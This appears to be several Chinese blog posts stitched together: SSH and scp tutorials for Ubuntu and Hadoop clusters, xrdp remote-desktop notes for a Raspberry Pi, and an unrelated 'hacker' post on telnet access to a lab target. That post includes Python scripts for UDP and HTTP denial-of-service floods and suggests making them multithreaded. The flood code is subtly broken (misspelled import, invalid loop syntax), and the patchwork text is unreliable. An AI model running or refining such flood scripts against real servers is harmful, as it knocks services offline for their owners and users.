目录

SSH的安全机制

SSH的安装

启动服务器的SSH服务

SSH两种级别的远程登录

SSH的高级应用

Secure Shell(SSH) 是由 IETF(The Internet Engineering Task Force) 制定的建立在应用层基础上的安全网络协议。它是专为远程登录会话(甚至可以用Windows远程登录Linux服务器进行文件互传)和其他网络服务提供安全性的协议，可有效弥补网络中的漏洞。通过SSH，可以把所有传输的数据进行加密，也能够防止DNS欺骗和IP欺骗。还有一个额外的好处就是传输的数据是经过压缩的，所以可以加快传输的速度。目前已经成为Linux系统的标准配置。

SSH只是一种协议，存在多种实现，既有商业实现，也有开源实现。本文主要介绍OpenSSH免费开源实现在Ubuntu中的应用，如果要在Windows中使用SSH，需要使用另一个软件PuTTY。

SSH的安全机制

SSH之所以能够保证安全，原因在于它采用了非对称加密技术(RSA)加密了所有传输的数据。

传统的网络服务程序，如FTP、Pop和Telnet其本质上都是不安全的；因为它们在网络上用明文传送数据、用户帐号和用户口令，很容易受到中间人（man-in-the-middle）攻击方式的攻击。就是存在另一个人或者一台机器冒充真正的服务器接收用户传给服务器的数据，然后再冒充用户把数据传给真正的服务器。

但并不是说SSH就是绝对安全的，因为它本身提供两种级别的验证方法：

第一种级别（基于口令的安全验证）：只要你知道自己帐号和口令，就可以登录到远程主机。所有传输的数据都会被加密，但是不能保证你正在连接的服务器就是你想连接的服务器。可能会有别的服务器在冒充真正的服务器，也就是受到“中间人攻击”这种方式的攻击。

第二种级别（基于密钥的安全验证）：你必须为自己创建一对密钥，并把公钥放在需要访问的服务器上。如果你要连接到SSH服务器上，客户端软件就会向服务器发出请求，请求用你的密钥进行安全验证。服务器收到请求之后，先在该服务器上你的主目录下寻找你的公钥，然后把它和你发送过来的公钥进行比较。如果两个密钥一致，服务器就用公钥加密“质询”(challenge)并把它发送给客户端软件。客户端软件收到“质询”之后就可以用你的私钥在本地解密再把它发送给服务器完成登录。与第一种级别相比，第二种级别不仅加密所有传输的数据，也不需要在网络上传送口令，因此安全性更高，可以有效防止中间人攻击。

SSH的安装

SSH分为客户端 openssh-client 和服务器 openssh-server，可以利用以下命令确认电脑上是否安装了客户端和服务器。

dpkg -l | grep ssh



如果只是想远程登陆别的机器只需要安装客户端（Ubuntu默认安装了客户端），如果要开放本机的SSH服务就需要安装服务器。

sudo apt-get install openssh-client 
sudo apt-get install openssh-server 

启动服务器的SSH服务

首先确认ssh-server是否已经启动了

ps -e | grep ssh



如图，sshd 表示ssh-server已经启动了。如果没有启动，可以使用如下命令启动：

sudo /etc/init.d/ssh start 

停止和重启ssh服务的命令如下：

sudo /etc/init.d/ssh stop  #server停止ssh服务 
sudo /etc/init.d/ssh restart  #server重启ssh服务


接下来就可以进行使用客户机远程登录服务器了~

SSH两种级别的远程登录

一、口令登录

口令登录非常简单，只需要一条命令，命令格式为： ssh 客户端用户名@服务器ip地址  eg:

ssh ldz@192.168.0.1

如果需要调用图形界面程序可以使用 -X 选项

ssh -X ldz@192.168.0.1

如果客户机的用户名和服务器的用户名相同，登录时可以省略用户名。

ssh 192.168.0.1

还要说明的是，SSH服务的默认端口是22，也就是说，如果你不设置端口的话登录请求会自动送到远程主机的22端口。我们可以使用 -p 选项来修改端口号，比如连接到服务器的1234端口：

ssh -p 1234 ldz@192.168.0.1

客户机必须要知道服务器的ip地址。可以在服务器端电脑上利用 ifconfig 命令查看该机的ip地址：



如果是第一次登录远程主机，系统会给出下面提示：



意思是，该远程主机的真实性无法确定，其公钥指纹为 SHA256:FFobshqrGOachj7Xp4LsJ9+xkNBlyyOe8ZIPl7K+qQI，确定想要继续连接吗？

输入yes即可。这时系统会提示远程主机被添加到已知主机列表。

 



然后会要求我们输入远程主机的密码，输入的密码正确就可以成功登录了。命令提示符会修改为远程主机的提示符，现在开始，终端中输入的命令都将在服务器中执行。



我们可以通过 Ctrl+D 或者 exit 命令退出远程登录。

 

二、公钥登录

每次登录远程主机都需要输入密码是很不方便的，如果想要省去这一步骤，可以利用密钥对进行连接，还可以提高安全性。

1、在本机生成密钥对

使用ssh-keygen命令生成密钥对：

ssh-keygen -t rsa   #-t表示类型选项，这里采用rsa加密算法

然后根据提示一步步的按enter键即可（其中有一个提示是要求设置私钥口令passphrase，不设置则为空，这里看心情吧，如果不放心私钥的安全可以设置一下），执行结束以后会在 /home/当前用户 目录下生成一个 .ssh 文件夹,其中包含私钥文件 id_rsa 和公钥文件 id_rsa.pub。

2、将公钥复制到远程主机中

使用ssh-copy-id命令将公钥复制到远程主机。ssh-copy-id会将公钥写到远程主机的 ~/ .ssh/authorized_key 文件中

ssh-copy-id ldz@192.168.0.1

经过以上两个步骤，以后再登录这个远程主机就不用再输入密码了。

cheers~

 

SSH的高级应用

使用远程主机不中断的跑程序

当我们利用ssh在远程主机上跑程序的时候，只要关闭了终端就会中断ssh连接，然后远程主机上正在跑的程序或者服务就会自动停止运行。我们可以利用 nohup + 需要运行的程序 使运行的程序在切断ssh连接的时候仍然能够继续在远程主机中运行。nohup即no hang up(不挂起)。

除此之外还有很多远程操作应用，包括 数据传输、端口操作(将不加密的网络连接绑定到ssh端口实现间接加密) 等等，可以参考柚子皮大神的博客：https://blog.csdn.net/pipisorry/article/details/52269785

 

 

 

Windows远程登录树莓派有多种方式，

一种是SSH、

一种是VNC、xrdp等方式，推荐使用后者，这样windows直接mstsc就可以以界面形式远程控制树莓派~
安装xrdp包：
终端或在ssh执行：(前提要联网)

sudo apt-get install xrdp


安装后，在Windows的PC机上通过快捷键win+ R 运行mstsc，然后输入树莓派的IP即可远程连接，连接成功时还需要输入Pi的用户名密码。(默认用户名：pi ，密码：raspberry)


整理下Windows/Linux远程登录Linux原理:

远程桌面协议（RDP, Remote Desktop Protocol）是一个多通道（multi-channel）的协议，让用户（客户端或称“本地电脑”）连上提供微软终端机服务的电脑（服务器）

SSH（Secure Shell）是命令行远程登录。只要对方开启SSH服务，在同一网络环境就可以远程登录。

图形界面下的Linux远程登陆工具，我们一般都会想到vnc，但它的安全性不够，所以可以用xrdp。
如果只安装XRDP协议，是不能在windows上使用远程桌面连接到Ubuntu。还需要安装VNCServer才行。所以安装xrdp也会安装配置VNCServer：

安装完成后，系统会自动启动一个VNC会话进程监听服务：

当我们通过windows远程桌面客户端连接到Linux后，Linux系统会启动一个VNC服务

$ netstat –nltp

tcp6 :::5910 ::😗 LISTEN 7751/Xvnc

其中 tcp6表示使用ipv6协议。

5910 表示的是开启的服务端口是5910

7751是XVnc的进程号
此时，在windows上再使用VNCViewer连接到同一个端口

假设Linux的IP是192.168.1.20，则连接地址写192.168.1.20:10也可以连接到Linux便是一个证明。

而且，这2个桌面（RDP远程桌面客户端，VNCViewer）还是两边同步的。

其中，10表示的是终端号，从5900开始计数。

另外一种写法

192.168.1.20:5910也能够连接成功

此时5910表示的是端口号，这种方式更容易记忆一点。

首先先说下我写这些文章的目的.我的专业就是网络安全,因此,也愿意把自己所学的一些东西都分享出来.不过由于涉及到很多黑客的东西,一些软件我就不发了,脚本什么的你们可以拿去用.

更多的是为了给大家普及一下管于黑客的知识,以及如何防范黑客.这是我写的第一篇文章,希望能给你们带来一些启发.

实验环境:三台虚拟机,win7,win7,win2003,并且要关掉所有的防火墙
一.telnet远程登录
1.实验环境搭建
实验环境:攻击机win7,靶机win2003

telnet是windows里面的一个服务.基本windos都会自带这个服务,但是需要进行开启才可以.这个命令就类似于将对方的cmd复制到本地,攻击机输入的任何命令靶机都会执行.

有多厉害,就不需要我来说了吧.

这个命令需要攻击机和靶机都开启telnet命令才可以,不然就会出现下面这种情况:



会显示不是内部命令.因此需要开启这个服务.如图,我使用的攻击机是win7,开启的方法如下:

控制面板->程序和功能->打开或关闭windows功能->telnet服务器,telnet客户端都选择



我的靶机是win2003,开启的方法类似,在这里就不赘述了.这一步是必须要做的,不然在后面的连接会出现端口23未开启的问题.开启后的效果如图,记得一定要点击启动.


2.验证服务是否开启成功
在你的攻击机上面输入命令:
telnet /help

这时候会提示:



此时,你的telnet服务就开启成功了,可以进行下一步操作.
3.开始使用telnet进行远程连接
在开启win2003后,win7中首先输入第一条命令:
ping ip

此处的IP填写你靶机(win2003)的IP
如果发现可以ping通,进行下一步,如果发现ping不通,就说明网络的问题,解决了在进行下一步.

依次输入命令:
telnet 靶机ip

接着会提示一个是否确认的字符,输入y.

在输入你靶机的用户名和密码,如果按着步骤来的话,会出现下面的界面:



很好,此时你已经连接上你的靶机了,接下来你就可以使用命令来为所欲为了,比如创建用户,就是俗称的留后门,以及各种各样的操作.当然,步骤比较简单,是因为我们把自己的电脑的防护都降低到了最低.而真正的黑客会提前往你电脑里执行个脚本,将所有的防护自动关闭.想学的童鞋可以给个关注,以后我会写.
二.dos攻击

dos攻击虽然听着很厉害,但如果理解了以后就发现其实也就是那么回事.

dos攻击又称拒绝服务攻击,实现的方法有很多,这篇文章里面就写了三种实现方式.前面我会介绍用软件实现dos攻击,后面我会上代码来实现这种攻击.

软甲我就不发了,违法行为咱也不敢干,相信你们也不想见到我被封号

1.软件实现
比较出名的软件有"低轨道离子加农炮".上截图:


上面打红线的地方是输入你靶机的IP,然后点击lock on.下面有配置选项,记得把端口改成你靶机开放的端口,不然攻击是没有效果的.点击右边2.READY里面的那个按钮,攻击就开始了.

效果我就不演示了,我当时换成udp模式以后靶机直接死机.用wireshark抓包以后,全都是arp的包.
二.代码实现
1.udp泛洪攻击
这个原理就是发送大量的udp无用包,最后使服务器无法进行响应而死机.直接上代码:
from socket import *
import random

st = socket(AF_INET, SOCK_DGRAM)
bytes = '123'
ip =''
port = 1
sent = 0

print("UDP flood attack is about to begin...")

while True:
    st.sendto(bytes, (ip, port))
    sent += 1
    port += 1
    print("Sent %s packet to %s throught port:%s" % (sent, ip, port))
    if port == 65534:
        port = 1


这个是python的代码.用的时候记得把ip填上.当执行以后,会循环向每个端口建立连接请求,最后堵死每个端口.但是由于仅仅使用的是单线程,因此效果没有太明显.下面的图是脚本运行以后的截图,可以发现都不需要过滤都能抓到一堆arp包.


2.cc攻击
准确上来说,下面这段代码并不是cc攻击,而是利用爬虫的requests模块进行对网站的访问.当访问量足够大的时候,就会使服务器崩溃.因此我将其分类为cc攻击.
import reqests
ip=""
while 1=1
	requests.get("http://"+ip)

使用时记得加上靶机的ip.这个代码也是单线程的,可以用线程模块写成多线程的.

下面是抓包的结果.



如图,抓到的包都是tcp响应包.可以证明程序运行成功,不过由于量不够大,仍然无法使服务器崩溃.

写个总结吧.这次我只写了两个内容,telnet命令的使用,以及dos攻击的一些手段,内容比较简单,不过仍然需要好好看看.

不多说了,就这样吧.如果觉得有需要的话可以点个关注啥的,有兴趣的话可以加我q:1392969921

　　SSH是一种通讯协议，可以实现远程安全登录。可以通过如putty、MobaXterm等工具通过ssh安全登录到虚拟机进行操作。 

Openssh：ssh远程安全登录的开源实现（软件）。 

一、SSH远程登录的原理（基于口令） 

1、客户端向服务器发送远程请求 

如bigdata3登录到bigdata4： 

 

2、服务器接收到请求后，将自己的主机的公钥发送给客户端，公钥用于加密

3、客户端将主机发送来的公钥通过hash算法得出主机公钥的公钥指纹，核对公钥指纹是否正确，以确认当前请求连接的的是我们想要登录的主机。 

在bigdata4上查看公钥：ssh-keygen -lf /etc/ssh/ssh_host_ecdsa_key.pub  

 (我的主机用的是ssh的ECC 算法，通过ssh-keygen -t ecdsa生成密钥对。) 

 bigdata4上的公钥和bigdata3请求时SHA256是一样的。 

 

4、核对过公钥后，人机交互界面输入yes,客户端会将服务端的公钥保存在$HOME/.ssh/know_hosts文件中，可通过 cat  ～/.ssh/know_hosts文件中查看保存在客户端的公钥。 

 

5、客户端用服务端的公钥将密码进行加密并发送给服务端

6、服务端接收到用自己公钥加密的客户端的密码，用在/etc/ssh下对应的私钥进行解密然后对比密码并返回登录结果，私钥用来解密。

二、ssh的免密码登录（基于密钥）

　　Hadoop控制脚本(并非守护进程)依赖SSH来执行针对整个集群的操作。为了支持无缝式工作，安装配置好ssh之后，可以是集群内机器的hdfs用户和yarn用户免密码登录。实现的最简单的方法是创建一个公钥/私钥对，存放到NFS中，让整个集群共享该密钥对。如果home目录并没有通过NFS共享，则需要利用ssh-copy-id等方法共享公钥。 

注意：免密登录也不是万能的。免密登录时值从一台主机A的用户userA,使用userB用户（B主机的一个用户）登录到主机B。存在着严格的对应关系：比如只能用bigdata1的root使用bigdata2的root用户登录到主机bigdata2:root@bigdata1 ====>root@bigdata2。 

实现步骤： 

1、在客户端生成一对密钥（公钥/私钥） 

基于空口令生成一个新的ssh密钥，以实现无密码登录：

ssh-keygen -t rsa -P '' -f ~/.ssh/id_rsa

参数说明： 

-t  加密算法类型，这里是使用rsa算法 

-P 指定私钥的密码，不需要可以不指定 

-f  指定生成秘钥对保持的位置 

 

2、将客户端公钥发送个服务端（其他客户端），使用ssh-copy-id 

ssh-copy-id root@bigdata2

 

注：经过ssh-copy-id后接收公钥的服务端会把公钥追加到服务端对应用户的$HOME/.ssh/authorized_keys文件中 

 

3、客户端请求（带有自己的用户名和主机名）

4、服务端根据客户端的用户名和主机名查找对应的公钥，将一个随机的字符串用该公钥加密后发送给客户端

5、客户端用自己的私钥进行解密收到的字符串，并将解密后的字符串发送给服务端

6、服务端对比发送出去的和接收到的字符串是否相同，返回登录结果 

测试：登录成功 



三、远程拷贝命令 scp 

　　scp工具，基于ssh远程安全登录的，可以将主机A上的文件或目录拷贝给主机B并且改名字，也可以将主机B上的文件或目录下载到主机A中，同时也支持修改文件名。


远程拷贝文件 

scp 本机文件 user@host:路径/ 

注：将bigdata1上的/etc/profile文件拷贝到bigdata2的根目录下 

scp /etc/profile root@bigdata2:/ 

注：将bigdata1上的/etc/profile文件拷贝到bigdata2的根目录下,并改名为profile.txt  

scp /etc/profile root@bigdata2:/profile.txt
远程拷贝目录 

scp -r 本机目录 user@host:路径/ 

注：将bigdata1上的/bin目录拷贝到bigdata2的根目录下 

scp -r /bin root@bigdata1:/home/ （-r  表示递归）
下载文件到本地 

scp user@host:文件名 本地目录 

注：将bigdata2上的/profile下载到本地并改名为profile.txt 

scp root@bigdata2:/profile  ./profile.txt
下载目录到本地 

scp -r user@host:文件名 本地目录 

注：将bigdata2上的/bin下载到本地并改名为bin.bak 

scp -r root@bigdata2:/home/bin  ./bin.bak